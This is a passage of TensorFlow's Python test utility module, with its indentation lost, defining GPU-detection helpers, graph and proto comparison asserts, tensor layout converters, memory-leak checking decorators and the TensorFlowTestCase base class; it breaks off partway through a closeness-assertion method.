from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError(
"Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
prev_value = ops._USE_C_API
ops._USE_C_API = use_c_api
try:
# Reset the default graph so it has the C API enabled. We call
# reset_default_graph() instead of creating a new default Graph context to
# make this robust to tests that call reset_default_graph(), which requires
# that the current default graph isn't nested.
ops.reset_default_graph()
fn(*args, **kwargs)
finally:
ops._USE_C_API = prev_value
# Make sure default graph reflects prev_value in case next test doesn't call
# reset_default_graph().
ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
fn(*args, **kwargs)
return wrapper
return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
"""Decorator for disabling the C API on a test.
Note this disables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, False, *args, **kwargs)
return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
"""Decorator for enabling the C API on a test.
Note this enables the C API after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
_use_c_api_wrapper(fn, True, *args, **kwargs)
return wrapper
def enable_c_shapes(fn):
"""Decorator for enabling C shapes on a test.
Note this enables the C shapes after running the test class's setup/teardown
methods.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
prev_value = ops._USE_C_SHAPES
# Only use C shapes if the C API is already enabled.
ops._USE_C_SHAPES = ops._USE_C_API
try:
fn(*args, **kwargs)
finally:
ops._USE_C_SHAPES = prev_value
return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API:
return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
def assert_no_new_pyobjects_executing_eagerly(f):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then
several times to let objects accumulate. The warmup helps ignore caches which
do not grow as the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
"""
def decorator(self, **kwargs):
"""Warms up, gets an object count, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
f(self, **kwargs)
gc.collect()
previous_count = len(gc.get_objects())
for _ in range(3):
f(self, **kwargs)
gc.collect()
# There should be no new Python objects hanging around.
new_count = len(gc.get_objects())
# In some cases (specifacally on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert new_count <= previous_count, (
"new_count(%d) is not less than or equal to previous_count(%d)" % (
new_count, previous_count))
gc.enable()
return decorator
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
__unused__: Prevents sliently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(
local_device.physical_device_desc) >=
min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all([x in str(e) for x in ["CUDA", "not find"]]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves different than session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
